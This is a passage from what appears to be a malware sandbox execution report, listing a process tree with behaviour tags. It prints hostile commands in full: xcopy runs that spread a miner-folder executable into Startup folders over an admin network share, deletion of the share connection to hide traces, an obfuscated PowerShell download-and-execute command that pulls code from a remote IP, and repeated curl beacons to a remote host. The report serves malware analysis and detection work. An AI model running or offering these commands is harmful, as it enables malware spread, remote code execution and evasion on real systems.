C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:8456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:8460
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7732
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6808
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:7416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5744
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:8676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:8716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:7904
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:4116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7720
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:8888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:4068
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "6⤵PID:8484
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5636
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:6764
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:3908 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:1408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:6560 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6312
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4280
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:5472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6112
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:3756 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:9084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7532
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:9164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:5760 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:8164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:8492 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:3032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7520
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:5228
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:9004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "6⤵PID:8980
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5084
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5020
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5344
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\file.exe"C:\Users\Admin\AppData\Local\Temp\a\file.exe"3⤵PID:5600
-
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵PID:8332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:8528 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵PID:7680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:7744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\L.exe"C:\Users\Admin\AppData\Local\Temp\a\L.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6652
-
-
C:\Users\Admin\AppData\Local\Temp\a\ttl.exe"C:\Users\Admin\AppData\Local\Temp\a\ttl.exe"3⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\a\ttl.exe"C:\Users\Admin\AppData\Local\Temp\a\ttl.exe"4⤵
- Loads dropped DLL
PID:7440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:6264
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:4172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:7052
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:6132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:2464
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:6128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:5076
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:6480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:5948
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:7844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:7104
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:8376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:6664
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:8588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:6312
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:5732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:8308
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:5236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:7544
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:7060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:5136
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:7084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:2084
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:7160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:9072
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:1380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:6628
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:6420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:6544
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:8672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:2672
-
C:\Windows\system32\curl.execurl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq"6⤵PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://mavmoslv.brazilsouth.cloudapp.azure.com/?m=Dpgnqmqq""5⤵PID:8404
-
